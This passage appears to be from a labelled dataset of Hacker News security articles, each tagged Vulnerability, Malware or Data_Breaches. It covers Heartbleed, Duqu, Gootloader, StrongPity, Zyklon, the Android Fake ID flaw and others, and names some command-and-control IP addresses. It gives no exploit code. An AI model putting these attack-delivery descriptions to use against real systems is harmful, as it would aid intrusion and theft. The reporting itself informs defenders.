TextSecure, an Android app developed by Open WhisperSystems, is completely open-source and claims to support end-to-end encryption of text messages. The app is free and designed by keeping privacy in mind.
However, while conducting the first audit of the software, security researchers from Ruhr University Bochum found that the most popular mobile messaging app is open to an Unknown Key-Share attack.
After Edward Snowden revealed state surveillance programs conducted by the National Security Agency, and meanwhile when Facebook acquired WhatsApp, TextSecure came into limelight and became one of the best alternatives for users who want a secure communication.
""Since Facebook bought WhatsApp, instant messaging apps with security guarantees became more and more popular,"" the team wrote in the paper titled, ""How Secure is TextSecure?"".
The messaging app attracted a lot of attention lately and was downloaded by half a million users from the Google's Play Store. The research team explained a complete and precise document and analyze of TextSecure's secure push messaging protocol.
""We are the first to completely and precisely document and analyses TextSecure's secure push messaging protocol,"" the team wrote.
""We show that if long-term public keys are authentic, so are the message keys, and that the encryption block of TextSecure is actually one-time stateful authenticated encryption [and] prove TextSecure's push messaging can indeed achieve the goals of authenticity and confidentiality.""
According to the research team, TextSecure works on a complex cryptographic protocol which is the part of the CyanogenMod Android operating system — a popular open source aftermarket Android firmware that has been installed on about 10 million Android devices. But researchers discovered an Unknown Key-Share Attack (UKS) against the protocol.
The research was conducted by Tilman Frosch, Christian Mainka, Christoph Bader, Florian Bergsma, Jorg Schwenk and Thorsten Holz. For better understanding the UKS against the protocol, the team explained it via an example as follows:
""Bart wants to trick his friend Milhouse. Bart knows that Milhouse will invite him to his birthday party using TextSecure. He starts the attack by replacing his own public key with Nelson's public key and lets Milhouse verify the fingerprint of his new public key. This can be justified, for instance, by claiming to have a new device and having simply re-registered ... if Milhouse invites Bart to his birthday party, then Bart may just forward this message to Nelson who will believe that this message was actually sent from Milhouse. Thus, Milhouse believes that he invited Bart to his birthday party, where in fact, he invited Nelson.""
The researchers also provided a mitigation strategy, which has already been acknowledged by TextSecure's developers, that prevents the UKS attack. The proposed method actually resolves the issue, making TextSecure's push messaging secure and achieves one-time stateful authenticated encryption.
",Vulnerability
Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites,https://thehackernews.com/2021/03/gootkit-rat-using-seo-to-distribute.html,"A framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads.
""The Gootkit malware family has been around more than half a decade – a mature Trojan with functionality centered around banking credential theft,"" Sophos researchers Gabor Szappanos and Andrew Brandt said in a write-up published today.
""In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself.""
Dubbed ""Gootloader,"" the expanded malware delivery system comes amid a surge in the number of infections targeting users in France, Germany, South Korea, and the U.S.
First documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft.
Over the years, the cybercrime tool has evolved to gain new information-stealing features, with the Gootkit loader repurposed in combination with REvil/Sodinokibi ransomware infections reported last year.
While campaigns using social engineering tricks to deliver malicious payloads are a dime a dozen, Gootloader takes it to the next level.
The infection chain resorts to sophisticated techniques that involve hosting malicious ZIP archive files on websites belonging to legitimate businesses that have been gamed to appear among the top results of a search query using manipulated search engine optimization (SEO) methods.
What's more, the search engine results point to websites that have no ""logical"" connection to the search query, implying that the attackers must be in possession of a vast network of hacked websites. In one case spotted by the researchers, an advice for a real estate agreement surfaced a breached neonatal medical practice based in Canada as the first result.
""To ensure targets from the right geographies are captured, the adversaries rewrite website code 'on the go' so that website visitors who fall outside the desired countries are shown benign web content, while those from the right location are shown a page featuring a fake discussion forum on the topic they've queried,"" the researchers said.
Clicking the search result takes the user to a fake message board-like page that matches not only the search terms used in the initial query but also includes a link to the ZIP file, which contains a heavily obfuscated Javascript file that initiates the next stage of compromise to inject the fileless malware fetched from a remote server into memory.
This takes the form of a multi-stage evasive approach that begins with a .NET loader, which comprises a Delphi-based loader malware, which, in turn, contains the final payload in encrypted form.
In addition to delivering the REvil ransomware and the Gootkit trojan, multiple campaigns have been spotted currently leveraging the Gootloader framework to deliver the Kronos financial malware in Germany stealthily, and the Cobalt Strike post-exploitation tool in the U.S.
It's still unclear as to how the operators gain access to the websites to serve the malicious injects, but the researchers suspect the attackers may have obtained the passwords by installing the Gootkit malware or purchasing stolen credentials from underground markets, or by leveraging security flaws in present in the plugins used alongside content management system (CMS) software.
The findings have been echoed by Microsoft in a series of tweets, noting it's ""seeing numerous extensive hands-on-keyboard attacks emanating from the Gootkit malware, which is distributed via drive-by downloads as a JavaScript within a ZIP file.""
""The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware,"" said Gabor Szappanos, threat research director at Sophos.
""This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result,"" he added.
",Malware
Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable,https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html,"It is advised to those who are running their web server with OpenSSL 1.0.1 through 1.0, then it is significantly important that you update to OpenSSL 1.0.1g immediately or as soon as possible.
As this afternoon, an extremely critical programming flaw in the OpenSSL has been discovered that apparently exposed the cryptographic keys and private data from some of the most important sites and services on the Internet.
The bug was independently discovered by security firm Codenomicon along with a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library and its weakness allows cyber criminals to steal the information protected, under normal conditions, by the SSL (Secure Sockets Layer) or TLS (Transport Security Layer) encryption used to secure the Internet.
OpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.
HEARTBLEED BUG
The discoverer of the vulnerability dubbed the bug as 'Heartbleed bug', as the exploit rests on a bug in the implementation of OpenSSL's TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520).
This critical bug with code ID CVE-2014-0160, could allows an attacker to expose up to 64kB of memory from the server or a connected client computer running a vulnerable version of OpenSSL software. Specifically, this means that an attacker can steal keys, passwords and other private information remotely.
""We have tested some of our own services from attacker's perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication.""
The vulnerability in the OpenSSL's transport layer security (TSL) protocols' heartbeat section has been in the wild since March 2012 and is supposed to be even more dangerous than Apple's recent SSL bug, which outcropped the possibility for man-in-the-middle (MitM) attacks.
As the Heartbleed bug reveals encryption keys that could lead to other compromises, affects past traffic and may affect as much as 66 percent of Internet websites over the internet. 10 out of top 1000 sites are vulnerable to this flaw, including Yahoo Mail, Lastpass and the FBI site. There also is a proof-of-concept exploit for the flaw posted on Github. On this website, you can check if your web server is vulnerable or not.
""Bugs in single software or library come and go and are fixed by new versions,"" the researchers who discovered the vulnerability wrote in a blog post published Monday. ""However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously.""
Fixes for the bug have been released by the researchers. So, who are running the OpenSSL 1.0.1f version may update to OpenSSL 1.0.1g. The users running older version of OpenSSL are safe.
Related Important Articles:
German Developer responsible for HeartBleed Bug in OpenSSL
How Heartbleed Bug Exposes Your Passwords to Hackers
How to Protect yourself from the 'Heartbleed' Bug
Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable
",Vulnerability
Leading Web Domain Name Registrars Disclose Data Breach,https://thehackernews.com/2019/10/domain-name-registrars-hacked.html,"Another day, another massive data breach—this time affecting a leading web technology company, as well as both of its subsidiaries, from where millions of customers around the world have purchased domain names for their websites.
The world's top domain registrars Web.com, Network Solutions, and Register.com disclosed a security breach that may have resulted in the theft of customers' account information.
Founded in 1999 and headquartered in Jacksonville, Florida, Web.com is a leading web technology company that owns both Network Solutions and Register.com. The companies offer web services like web hosting, website design, and online marketing to help people build their own websites.
What happened? — In late August 2019, a third-party gained unauthorized access to a ""limited number"" of the company's computer systems and reportedly accessed millions of records for accounts of current and former customers with Web.com, Network Solutions, and Register.com.
The company said it became aware of the security intrusion only on October 16, 2019, but did not disclose any details on how the incident happened.
What type of information was compromised? — According to the affected domain registrars, the stolen information includes contact details of their customers, such as:
Names
Addresses
Phone numbers
Email addresses
Information about the services offered to a customer.
What type of information was not compromised? — The companies also confirmed that no credit card information was compromised as a result of the security breach incident since they claim to encrypt their customers' credit card numbers before storing them on their databases.
""We store credit card numbers in a PCI (Payment Card Industry) compliant encryption standard and do not believe your credit card information is vulnerable as a specific result of this incident,"" reads a breach notice published on websites of Web.com, Network Solutions, and Register.com.
To be noted, the passwords for account logins of affected customers were also not compromised, which otherwise could have allowed attackers to permanently hijack domain names by transferring them to an account owned by attackers with a separate service.
What are the affected companies now doing? — The companies took necessary steps to stop the security intrusion upon discovery and immediately launched an investigation by engaging a leading independent cybersecurity firm to determine the scope of the incident.
The companies have also notified all the relevant authorities and already started working with federal law enforcement.
All three affected domain registrars are also in the process of contacting affected customers through email and via their websites.
What affected customers should do now? — As a precaution, affected customers are encouraged to change passwords for their Web.com, Network Solutions, and Register.com accounts and for any other online account where you use the same credentials.
Do it even if you are not affected—just to be on the safer side.
""We have already taken additional steps to secure your account, and there is nothing you need to do at this time. The next time you log in to your account, you will be required to reset your password,"" the domain registrars recommend.
Since the exposed data includes personal identifying information (PII), affected customers should mainly be suspicious of phishing emails, which are usually the next step of cybercriminals in an attempt to trick users into giving away their passwords and credit card information.
Although the data breach did not expose any financial information, it is always a good idea to be vigilant and keep a close eye on your bank and payment card statements for any unusual activity and report to the bank if you find any.
This is not the first time Web.com has disclosed a security incident. In August 2015, the company suffered a major data breach that had compromised personal and credit card information belonging to nearly 93,000 customers.
",Data_Breaches
DUQU – Another Stuxnet in the Making ?,https://thehackernews.com/2011/11/duqu-another-stuxnet-in-making.html,"DUQU – Another Stuxnet in the Making ?
Article by : Nidhi Rastogi is a Cyber security professional based in New York. Article shared from THE HACKER NEWS magazine - November Edition. You can download Complete Magazine here.
Barely a year into discovering Stuxnet, the world recently saw its powerful variant in the form of Duqu. It is believed that a Hungarian blogger was the first to have a tryst with the virus in early September at an ISP hosting service.
Why it is important: Duqu has gained a lot of attention because of striking similarities with its famous predecessor, Stuxnet. Several Security researchers have concluded that 99 percent of Duqu software rules are same as Stuxnet including source code and keys for encryption. There is reasonable evidence by now that the damage caused by Stuxnet was real. Hence, Duqu is of concern to every security professional at the moment.
How it functions: Duqu camouflages its own data behind normal web traffic to avoid suspicion from network administrators. This information is then sent over to a remote command and control server (CC server) using http request. The server responds with a blank JPG image, in response to which, Duqu sends back an image appended with encrypted stolen information. The IP address of the CC server used for these initial operations was 206.183.111.97 and was tracked to India. The CC server has been deactivated since then.
The Trojan horse, unlike Stuxnet, is able to record keystrokes, collect various details of system which is then encrypted and appended to an image file. The data may simply be configuration and design data from the systems, presumably to allow someone get competitive advantage. The Trojan has been configured to run on the host machine for 36-days, after which the threat vector will automatically destroy itself from the system. However, additional components sent from the CC server can extend the life beyond this time period.
Purpose: Duqu appears to be focusing on data mining right now, scouting host machine to gain information or features about the environment. The real purpose of spreading the Trojan has been obscure and the data collection may just be an initial stage of a larger setup.
Complexity: There is nothing novel about the attack vector and it can be safely assumed that the creator at least had access to Stuxnet code. Once a certain piece is in circulation, others build upon it. And this may be the case with Duqu. Duqu too, like Stuxnet, uses a stolen digital certificate from a Taiwanese company to prove its authenticity. Also, Duqu couldn't have been around for too long since the driver sign date has been recorded to be July 2011. There is also a likelihood of the same team being employed to create the Stuxnet variant. Like the Stuxnet, Duqu too is a State sponsored attack, since no other party would engage in an activity that requires ample technical caliber but brings no obvious monetary benefit.
Other Theories: Various theories are floating around about the motive and origin of Duqu. One of the interesting one is by @reversemode on twitter. According to him, one of the galaxy pictures comes from 66.49.141.227, which suggests Hebrew connection with Duqu. In the past 1 week, a few more variants have been discovered, but not much can be said about them as it too early.
Analysis: Duqu gives the impression of something much bigger coming up than what meets the eye. It is also interesting to note that the techniques used to deploy these attacks are not state of the art. The depth of information that can be extracted using Duqu is no different from what Stuxnet could do. Neither is it any more sophisticated from what we have seen with Aurora. They were intriguing because of the coming together of a possibly destructive operation of their stature. But it's not the same with Duqu. Apart from the complexities it shares with its predecessor, Duqu creators have also used age-old techniques – bad password policy, use of USB drive outside of work and the likes to aid spread the virus. So what is it about this trojan-virus that is catching every eye-ball?
Duqu bears testimony to the beginning of an era where cyber war will grow bigger than nuclear and the likes. It is not that we were caught unaware of nation states espionage programs this time. It is the frequency with which they were discovered corroborates the theory that future will see a steep rise in cybercrime. Dealing with this is going to be a major focus for a majority of us security professionals.
DUQU in news :
Duqu malware was created to spy on Iran's nuclear program
Duqu Trojan found in Indian Server
Duqu Analysis and Detection Tool by NSS Labs
Stuxnet's Son ""Duqu"" Removal Tool released by Bitdefender
Windows Kernel Zero Day Vulnerability Found in Duqu Installer
",Malware
Searching for Best Encryption Tools? Hackers are Spreading Malware Through Fake Software,https://thehackernews.com/2016/10/best-encryption-tools.html,"Over the past few years, Internet users globally have grown increasingly aware of online privacy and security issues due to mass monitoring and surveillance by government agencies, making them adopt encryption software and services.
But it turns out that hackers are taking advantage of this opportunity by creating and distributing fake versions of encryption tools in order to infect as many victims as possible.
Kaspersky Lab has revealed an advanced persistent threat (APT) group, nicknamed StrongPity, which has put a lot of efforts in targeting users of software designed for encrypting data and communications.
The StrongPity APT group has been using watering-hole attacks, infected installers, and malware for many years to target users of encryption software by compromising legitimate sites or setting up their own malicious copycat sites.
Watering hole attacks are designed to lure specific groups of users to their interest-based sites that typically house malicious files or redirect them to attacker-controlled downloads.
The StrongPity APT group has managed to infect users in Europe, Northern Africa, and the Middle East and targeted two free encryption utilities in different attacks: WinRAR and TrueCrypt.
WinRAR and TrueCrypt are long popular within security and privacy conscious users. WinRAR is best known for its archiving capabilities that encrypting files with AES-256 crypto, while TrueCrypt is a full-disk encryption utility that locks all files on a hard drive.
By setting up fake distribution sites that closely mimic legitimate download sites, StrongPity is able to trick users into downloading malicious versions of these encryption apps in hopes that users encrypt their data using a trojanized version of WinRAR or TrueCrypt apps, allowing attackers to spy on encrypted data before encryption occurred.
""The problem with people depending on tools like this isn't the strength of the crypto, but more about how it's distributed,"" says Kurt Baumgartner, principal security researcher at Kaspersky Lab. ""This is that problem that StrongPity is taking advantage of.""
Booby-Trapped WinRAR and TrueCrypt Downloads
The APT group previously set up TrueCrypt-themed watering holes in late 2015, but their malicious activity surged in end of summer 2016.
Between July and September, dozens of visitors have redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on computer systems in Turkey, with some victims in the Netherlands.
However, in WinRAR case, instead of redirecting victims to a website controlled by StrongPity, the group hijacked the legitimate winrar.it website to host a malicious version of the file themselves.
The winrar.it website infected users mostly in Italy, with some victims in countries like Belgium, Algeria, Tunisia, France, Morocco and Cote D'Ivoire, while the attackers controlled site, winrar.be, infected users in Belgium, Algeria, Morocco, the Netherlands, and Canada.
Top Countries infected with StrongPity APT malware
According to Kaspersky, more than 1,000 systems infected with StrongPity malware this year. The top five countries affected by the group are Italy, Turkey, Belgium, Algeria and France.
The StrongPity APT's dropper malware was signed with ""unusual digital certificates,"" but the group didn't re-use its fake digital certificates. It downloaded components include a backdoor, keyloggers, data stealers and other crypto-related software programs, including the putty SSH client, the filezilla FTP client, the Winscp secure file transfer program and remote desktop clients.
The dropper malware not only provides the hackers control of the system, but also allows them to steal disk contents and download other malware that would steal communication and contact information.
Therefore, users visiting sites and downloading encryption-enabled software are advised to verify both the validity of the distribution website as well as the integrity of the downloaded file itself.
Download sites that not use PGP or any strong digital code signing certificate are required to re-examine the necessity of doing so for the benefits of them as well as their own customers, explained Baumgartner.
",Malware
Windows Kernel Zero Day Vulnerability Found in Duqu Installer,https://thehackernews.com/2011/11/windows-kernel-zero-day-vulnerability.html,"Windows Kernel Zero Day Vulnerability Found in Duqu Installer
Duqu malware attack exploited a zero-day vulnerability in the Windows kernel, according to security researchers tracking the Stuxnet-like cyber-surveillance Trojan. The vulnerability has since been reported to Microsoft and Microsoft is working on a fix for the kernel vulnerability right now.
Researchers at the Laboratory of Cryptography and System Security (CrySyS) in Hungary confirmed the existence of the zero-day vulnerability and exploit in a brief note posted to its web site.
Our lab, the Laboratory of Cryptography and System Security (CrySyS) pursued the analysis of the Duqu malware and as a result of our investigation, we identified a dropper file with an MS 0-day kernel exploit inside. We immediately provided competent organizations with the necessary information such that they can take appropriate steps for the protection of the users.
The installer file is a Microsoft Word document (.doc) that exploits a previously unknown kernel vulnerability that allows code execution. We contacted Microsoft regarding the vulnerability and they're working diligently towards issuing a patch and advisory. When the file is opened, malicious code executes and installs the main Duqu binaries. The chart below explains how the exploit in the Word document file eventually leads to the installation of Duqu.
Other security vendors have reported infections in the following countries: • Austria • Hungary • Indonesia • United Kingdom • Iran - infections different from those observed by Symantec.
""Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. We are working diligently to address this issue and will release a security update for customers through our security bulletin process,"" Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group said in a statement.
You can find Symantec updated whitepaper (version 1.3) here. Key updates in the Symantec whitepaper include:
• An unpatched zero-day vulnerability is exploited through a Microsoft Word document and installs Duqu
• Attackers can spread Duqu to computers in secure zones and control them through a peer-to-peer C&C protocol
• Six possible organizations in eight countries have confirmed infections
• A new C&C server (77.241.93.160) hosted in Belgium was discovered and has been shut down.
[Source]
",Malware
"Android ""Fake ID"" Vulnerability Allows Malware to Impersonate Trusted Apps",https://thehackernews.com/2014/07/android-fake-id-vulnerability-allows_29.html,"Due to the majority in the mobile platform, Google's Android operating system has been a prior target for cybercriminals and a recently exposed weakness in the way the operating system handles certificate validation, left millions of Android devices open to attack.
Researchers at BlueBox security, who identified the vulnerability, dubbed the flaw as Fake ID, which affects all versions of Android operating system from 2.1 (released in 2010) up to Android 4.4, also known as KitKat.
ALL VERSIONS ARE VULNERABLE UPTO KITKAT
Researchers marked the vulnerability as critical because it could allow a fake and malicious app to masquerade as a legitimate and trusted application, enabling an attacker to perform various actions such as inserting malicious code into a legitimate app, infiltrating your personal information or even take complete control of an affected device. Specifically, devices running the 3LM administration extension are at risk for a complete compromise, which includes devices from HTC to Pantech, Sharp, Sony Ericsson, and Motorola.
""Every Android application has its own unique identity, typically inherited from the corporate developer's identity,"" Bluebox CTO Jeff Forristal wrote in a blog post published Wednesday. The bug, however, will copy the identifies and use them ""for nefarious purposes.""
WHAT IS ""FAKE ID"" ANDROID VULNERABILITY
Researchers named the flaw ""Fake ID"" because it allows malicious applications to pass fake credentials to Android OS, which fails to properly verify the application's cryptographic signature. Instead, the operating system grants all the access permissions to the rogue application that it grants to the legitimate app.
Actually, in order to establish the identity of the app developer, Android applications are signed using digital certificates. But due to the claimed Fake ID vulnerability, the Android app installer doesn't try to authenticate the certificate chain of a given app, which means an attacker can built an app with a fake identity and impersonate it with extensive privileges such as an Adobe plug-in or Google Wallet.
IMPACT AND EXAMPLES
In the case of Adobe, the malware app would look like Adobe-trusted code and have the ability to escape the sandbox and run malicious code inside another app, the researchers said.
""For example, an attacker can create a new digital identity certificate, forge a claim that the identity certificate was issued by Adobe Systems, and sign an application with a certificate chain that contains a malicious identity certificate and the Adobe Systems certificate,"" the Bluebox researchers said in a post explaining their discovery.
""Upon installation, the Android package installer will not verify the claim of the malicious identity certificate, and create a package signature that contains the both certificates. This, in turn, tricks the certificate-checking code in the webview plugin manager (who explicitly checks the chain for the Adobe certificate) and allows the application to be granted the special webview plugin privilege given to Adobe Systems – leading to a sandbox escape and insertion of malicious code, in the form of a webview plugin, into other applications.""
TARGETING GOOGLE WALLET PAYMENT SYSTEM
Researchers also pointed out one more target of an attacker exploiting the Fake ID vulnerability i.e. Google's own Wallet payment system. A malicious app with signature of Google Wallet would allow an attacker to access the NFC (Near Field Communications) chip in the device.
The NFC chip in the device is responsible for the storage of payment information used in NFC payments via Google Wallet. This NFC is used in various electronic payment applications and a malicious code can harvest credit card numbers as well.
According to Jeff Forristal, the attackers have more ways to exploit Fake ID vulnerability, a bug that he will discuss in a presentation at Black Hat in Las Vegas next week.
PATCH RELEASED, BUT YOU CAN'T GET IT IMMEDIATELY
Google already released a patch to its partners in April. However, it still leaves a millions of handsets out there that are still vulnerable, as it's up to the carriers themselves to push the updates to users.
The vulnerability resides in the Android operating system therefore the new update would be available for the users in the coming period, may be today, a month after or could take a year.
As the researchers say, Effectively addressing a vulnerability requires a three step process:
Google produces a generic code fix, which it provides to the Android phone manufacturers
Then phone manufacturers must then incorporate that fix into a firmware update suitable to specific phones, which they provide to carriers
The carrier then distributes the final update, which ensures your phone is safe from the vulnerability As regards Fake ID, Google has provided the generic code fix to the phone manufacturers.
Bluebox Security has also built a Scanner to test for the vulnerability and has a couple of ideas for those who still haven't got the patch.
Bluebox Security is the same company that uncovered the so-called Android ""Master Key"" vulnerability that allowed an attacker to modify any legitimate and digitally signed application in order to transform it into a Trojan program that could then be used to steal device' information or take control of the device.
",Malware
Hackers Exploiting Three Microsoft Office Flaws to Spread Zyklon Malware,https://thehackernews.com/2018/01/microsoft-office-malware.html,"Security researchers have spotted a new malware campaign in the wild that spreads an advanced botnet malware by leveraging at least three recently disclosed vulnerabilities in Microsoft Office.
Dubbed Zyklon, the fully-featured malware has resurfaced after almost two years and primarily found targeting telecommunications, insurance and financial services.
Active since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over Tor anonymising network and allows attackers to remotely steal keylogs, sensitive data, like passwords stored in web browsers and email clients.
Zyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining.
Different versions of the Zyklon malware has previously been found being advertised on a popular underground marketplace for $75 (normal build) and $125 ( Tor-enabled build).
According to a recently published report by FireEye, the attackers behind the campaign are leveraging three following vulnerabilities in Microsoft Office that execute a PowerShell script on the targeted computers to download the final payload from its C&C server.
1) .NET Framework RCE Vulnerability (CVE-2017-8759)—this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email. Microsoft already released a security patch for this flaw in September updates.
2) Microsoft Office RCE Vulnerability (CVE-2017-11882)—it's a 17-year-old memory corruption flaw that Microsoft patched in November patch update allows a remote attacker to execute malicious code on the targeted systems without requiring any user interaction after opening a malicious document.
3) Dynamic Data Exchange Protocol (DDE Exploit)—this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to perform code execution on the targeted device without requiring Macros to be enabled or memory corruption.
As explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrives with an attached ZIP file containing a malicious Office doc file.
Once opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer.
""In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,"" the FireEye researchers said.
""The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode.""
""The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework.""
Interestingly, the PowerShell script connects to a dotless IP address (example: https://3627732942) to download the final payload.
What is Dotless IP Address? If you are unaware, dotless IP addresses, sometimes referred as 'Decimal Address,' are decimal values of IPv4 addresses (represented as dotted-quad notation). Almost all modern web browsers resolve decimal IP address to its equivalent IPV4 address when opened with ""https://"" following the decimal value.
For example, Google's IP address 216.58.207.206 can also be represented as https://3627732942 in decimal values (Try this online converter).
The best way to protect yourself and your organisation from such malware attacks are always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.
Most importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software—Microsoft Office, in this case—to increase the potential for successful infections.
",Malware
Google Discloses Another Unpatched Windows 8.1 Vulnerability,https://thehackernews.com/2015/01/windows-8-hacking-exploit.html,"Google has once again released the details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system before Microsoft planned to patch the bug, triggering a new quarrel between the two tech giants.
This is second time in less than a month when the Google's security research team known as Project Zero released details of the vulnerability in Microsoft's operating system, following its 90-day public disclosure deadline policy.
Google Project Zero team routinely finds vulnerabilities in different products from different companies. The vulnerabilities then get reported to the affected software vendors and if they do not patch the flaws in 90 days, Google automatically makes the vulnerability along with its details public.
DISCLOSURE OF TWO SECURITY HOLES IN LESS THAN A MONTH
Two weeks back, Google Project Zero team disclosed details of an elevation of privilege (EoP) vulnerability affecting Windows 8.1 that may have allowed hackers to modify contents or even to take over victims' computers completely, leaving millions of users vulnerable.
At the time, Microsoft criticized Google for disclosing the Windows 8.1 security flaw out in the public just before it was planing to fix it. According to Microsoft, the Windows 8.1 vulnerability disclosed by Google may have potentially exposed the users of the operating system to hackers.
However, releasing details with the proof of concept for the second security hole in Microsoft's Windows 8.1 just two days before Microsoft planned to patch the bug indicates that Google project zero is determined to stick to its 90-day deadline for fixing software flaws.
MICROSOFT vs GOOGLE
Though, Microsoft is very upset with 90-day disclosure deadline enforced by Google's Project Zero team. The team notified the new elevation of privilege flaw to Microsoft on 13 October.
In November, Microsoft asked Google for an extension of the deadline till February 2015, when it plans to address the issue. However, the search engine giant refused. But later when Microsoft promised to address the vulnerability in January Patch Tuesday, Google still refused to extend its deadline even by two days.
""We asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix,"" said Chris Betz, senior director with Microsoft's Security Response Center, in a blog post Sunday. ""Although following through keeps to Google's announced timeline for disclosure, the decision feels less like principles and more like a 'gotcha', with customers the ones who may suffer as a result.""
TECHNICAL DETAILS OF THE NEW EoP FLAW
According to Google's security team, User Profile Service is used to create certain directories and mount the user hives as soon as a user logs into a computer. Other than loading the hives, the base profile directory is created under a privileged account, which is secure because normal user requires administrator privileges to do so.
""However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user's token, but this changes to impersonating Local System part of the way through,"" Google said. ""Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile.""
A proof-of-concept (PoC) demonstrating the attack on Microsoft's Windows 8.1 operating system has been published, but experts have confirmed that the vulnerability also affects Windows 7.
",Vulnerability
Authentication Bypass Vulnerability Found in Auth0 Identity Platform,https://thehackernews.com/2018/04/auth0-authentication-bypass.html,"A critical authentication bypass vulnerability has been discovered in one of the biggest identity-as-a-service platform Auth0 that could have allowed a malicious attacker to access any portal or application, which are using Auth0 service for authentication.
Auth0 offers token-based authentication solutions for a number of platforms including the ability to integrate social media authentication into an application.
With over 2000 enterprise customers and managing 42 million logins every day and billions of login per month, Auth0 is one of the biggest identity platforms.
While pentesting an application back in September 2017, researchers from security firm Cinta Infinita discovered a flaw (CVE-2018-6873) in Auth0's Legacy Lock API, which resides due to improper validation of the JSON Web Tokens (JWT) audience parameter.
Researchers successfully exploited this issue to bypass login authentication using a simple cross-site request forgery (CSRF/XSRF) attack against the applications running over Auth0 authentication.
Auth0's CSRF vulnerability (CVE-2018-6874) allows an attacker to reuse a valid signed JWT generated for a separate account to access the targeted victim's account.
For this, all an attacker needs is the victim's user ID or email address, which can be obtained using simple social engineering tricks.
Video Demonstration of the Attack
According to the researchers, the attack is reproducible against many organisations, ""as long as we know the expected fields and values for the JWT. There is no need of social engineering in most of the cases we saw. Authentication for applications that use an email address or an incremental integer for user identification would be trivially bypassed.""
The security firm reported the vulnerability to the Auth0 Security Team in October 2017. The company acted very fast and addressed the weakness in less than 4 hours.
However, since the vulnerable SDK and supported libraries of Auth0 have been implemented on the client side, Auth0 took almost six months to contact each of their customers and help them fix this vulnerability, before publicly disclosing this issue.
""Unlike the fix for the special case discovered by Cinta Infinita, this issue could not be solved without forcing our customers to upgrade the libraries/SDKs on their end, a much more significant undertaking,"" the Auth0 team said in its advisory.
The company has mitigated the vulnerabilities by extensively rewriting the affected libraries and releasing new versions of its SDKs (auth0.js 9 and Lock 11).
Cinta Infinita also waited six months before publicly disclosing the vulnerability, giving the Auth0 team enough time to update all their Private SaaS Appliances (on-premises) as well.
The security firm has now released a proof-of-concept (PoC) video, demonstrating how they obtained the victim's user id and bypass password authentication when logging into Auth0's Management Dashboard by forging an authentication token.
",Vulnerability
Zeus malware targeting BlackBerry and Android devices,https://thehackernews.com/2012/08/zeus-malware-targeting-blackberry-and.html,"Security researchers at Kaspersky Lab have discovered five new samples of the ZeuS-in-the-Mobile (ZitMo) malware package, targeting Android and BlackBerry devices.
Zitmo (Zeus in the mobile) is the name given to the mobile versions of Zeus, and it's been around for a couple of years already, mostly infecting Android phones. The Zitmo variant has reportedly been operating for at least two years targeting Android phones by masquerading as banking security application or security add-on.
ZitMo gets hold of banking information by intercepting all text messages and passing them on to attackers' own devices. It gets onto devices inside malicious applications, which users are duped into downloading. In this case, the malicious app was posing as security software called 'Zertifikat'.
Once installed, the packages forward all incoming SMS messages to one of two command and control numbers located in Sweden, with the aim of snaring secure codes and other data. Kaspersky found mobile users in Spain, Italy and Germany were targeted by these fresh variants, with two command and control (C&C) numbers found on Sweden's Tele2 operator.
""The analysis of new Blackberry ZitMo files showed that there are no major changes. Virus writers finally fixed grammar mistake in the 'App Instaled OK' phrase, which is sent via SMS to C&C cell phone number when smartphone has been infected. Instead of 'BLOCK ON' or 'BLOCK OFF' commands (blocking or unblocking all incoming and outgoing calls) now there are 'BLOCK' and 'UNBLOCK' commands. Other commands which are received via SMS remain the same."" Denis Maslennikov, a researcher at Kaspersky Lab.
The tactic is designed to help the criminals circumvent the out-of-band authentication systems used by many European banks, by hijacking the one-time password authentication password sent via SMS.
